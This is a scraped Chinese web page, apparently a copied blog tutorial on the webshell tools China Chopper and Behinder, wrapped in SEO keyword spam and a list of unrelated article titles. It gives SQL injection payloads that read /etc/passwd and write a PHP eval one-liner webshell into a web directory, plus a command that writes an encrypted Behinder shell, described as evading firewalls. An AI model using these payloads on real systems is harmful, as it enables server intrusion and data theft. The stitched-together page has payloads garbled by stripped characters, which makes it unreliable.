当前位置: 首页 > news >正文

关键词搜索北京seo平台

关键词搜索,北京seo平台,手机app开发工具中文版,免费手机端网站模板下载找到了漏洞后#xff0c;并且上传了木马之后才能使用的两款工具 中国菜刀和冰蝎 想办法获取别人的cookie#xff0c;cookie中有session-id 一、中国菜刀 1、必须提前已经完成木马植入然后才能使用 2、木马必须是POST请求#xff0c;参数自定义#xff0c;在菜刀里给出…找到了漏洞后并且上传了木马之后才能使用的两款工具 中国菜刀和冰蝎 想办法获取别人的cookiecookie中有session-id 一、中国菜刀 1、必须提前已经完成木马植入然后才能使用 2、木马必须是POST请求参数自定义在菜刀里给出正确的参数名。 是属于辅助工具并且菜刀的传输过程是明文传输的目前已经被WAF进行防护了。 先看是否存在注入点有下图所示则表示存在注入点》可以进行接下来的操作 http://192.168.74.133/security/read.php?id1 and 12 union select 1,2,3,4,5,6 有文件则说明可以读任意路径的文件 http://192.168.74.133/security/read.php?id1 and 12 union select 1,2,3,(select load_file(/etc/passwd)),5,6 写入一句话的木马进行探测如果嗅探成功后在进行大马的上传 http://192.168.74.133/security/read.php?id1 and 12 union select 1,2,3,?php eval($_POST[a]) ; ?,5,6 into outfile /opt/lampp/htdocs/security/temp/mm.php 在post中写入PHP的代码aphpinfo();可以获取你想要的配置信息也可以用system函数来输入命令 接下来就可以连接菜刀使用菜刀来连接木马然后就可以查看到服务器里面的东西了 使用wireshark进行抓包用来分析流量 假设菜刀被WAF挡了 二、Behinder冰蝎 冰蝎是加密传输防火墙很难分析出流量特征比较容易绕开防火墙。 所以需要先上传一个冰蝎自己的带加密功能的shell脚本这个上传shell的过程通常有以下几种方式 1直接在命令行运行命令按行用echo 写入 asystem(echo $postfile_get_contents(php://input); /opt/lampp/htdocs/security/temp/muma.php);
http://www.zqtcl.cn/news/813659/

相关文章:

  • 产品推广的网站怎么做网站标题与关键词
  • 青蛙网站建设wordpress修改logo
  • 网站套餐方案引擎搜索对人类记忆的影响
  • 滨州市滨城区建设局网站扎金花网站怎么做
  • 网站开发中视屏怎样编辑到网页上常州建站公司模板
  • 视频涉台互联网网站怎么做1cpu0.5g服务器用来做网站
  • 营销型网站设计官网怎么做网站优化 sit
  • 怎样获得做网站的客户免费企业网站程序上传
  • 新闻排版设计用什么软件网站seo诊断分析
  • 手机网站端域名怎样做解析一诺摄影设计
  • 网站开发行业竞争大吗郑州百度推广代运营公司
  • mvc4做网站五设计一个公司网站多少钱
  • 在什么网站可以做外贸出口劳保鞋北京 代理前置审批 网站备案
  • 邢台建设企业网站房地产宣传推广方案
  • 建设机械网站案例分析餐饮vi设计开题报告范文
  • 做本地生活网站深圳建设工程信息网站
  • C2C电商网站做博客的网站有哪些
  • 住房和城乡建设部网站 事故安微省建设厅田网站
  • 百度一下你就知道官页淘宝seo搜索引擎优化
  • 网站平台维护phpwind做的网站
  • 网站怎么做移动适配怎么样才算是一个网站页面
  • 做pc端网站策划百度网站建立
  • 高级网站开发技术青岛网站建设方案服务
  • 深圳公司网站建设设房地产网址大全
  • 怎么里ip做网站女生学广告学后悔死了
  • 做西餐网站wordpress 作者栏
  • 创建了网站安卓做视频网站
  • asp自助建站系统房地产楼盘微信网站建设营销方案
  • 网站建设公司发展方向及趋势低代码小程序开发平台
  • 临沂网站建设企业响应式网站首页